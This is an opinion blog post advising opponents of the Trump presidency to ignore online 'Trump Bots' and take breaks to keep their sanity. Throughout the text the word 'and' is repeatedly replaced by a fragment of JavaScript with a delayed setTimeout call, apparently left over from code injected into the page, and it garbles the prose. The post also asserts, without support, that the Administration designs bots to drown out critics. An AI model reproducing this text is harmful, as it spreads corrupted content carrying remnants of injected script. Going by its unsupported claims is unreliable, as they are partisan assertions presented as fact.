How to survive the Trump Presidency without going insane

I sat in front of my TV with a dazed look on my face. It was a rough day of hearing the latest Trump news. I felt drained. I had been posting about Trump on social media for months prior to the election. Since the election, I had continued writing. I had enough. I thought to myself, "How do Trump supporters think everything is going great? Are they paying attention? Is this the world they want?" Maybe they are onto something? Maybe I just need to change my views? Maybe I need to see the light? 5 minutes later, I was laughing hysterically at the TV andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and I had snapped back to reality.

So what can I (Or you) do to go from going completely insane under Trump's Presidency? No. I believe what I believe andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and it's not going to change. And I will continue to use social media to talk about my views. But that always comes with a cost. If you talk about the Trump Presidency in a negative way, you expose yourself to the army of Trump Bots. My social media friends are a group of great folks with varying political views. And yes, some are Trump supporters. I can talk to some, disagree andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and life goes on. But the Trump Bots are a different story.

Twitter is a haven for Trump bots. They are lying in wait for anyone who dares question Trump's questionable moves. Post something on the Russia investigation andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Trump Bots will come back screaming "Hillary belongs in jail! Russia is Fake News! WITCH HUNT!!!!!!!!! MAGA!!!!!!!!!!!!!!" And if you reply with any kind of response, the Bots will just keep screaming to drown you out. Why? That's what they are designed to do. The Trump Administration knows that our President thrives on positive, fawning feedback andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and negativity towards the Administration sends President Trump into tirades. And yes, there are the Russian Trump Bots with the same agenda. What should you do? Ignore them or block them. There aren't real humans behind many of these accounts. Trying to reason with them is like trying to explain to your dog the latest "Game of Thrones" episode. You won't get anywhere.

Ignoring the bots helps but you find yourself still having fake arguments with Trump supporters in your head? News headlines have you screaming at your TV? Trump's latest quote have you pinching your arm to make sure you are awake? Take a breath. Take a walk. Go see a fun comedy on the big screen. Go shopping. Hug a stranger. Eat a cookie. Go to a baseball game. Do whatever brings you joy. Take a break from the madness. It will be there when you return refreshed. We "Resistance" members are much better served if we are clear headed, happy people. We don't have to change our beliefs. We don't have to stay silent.
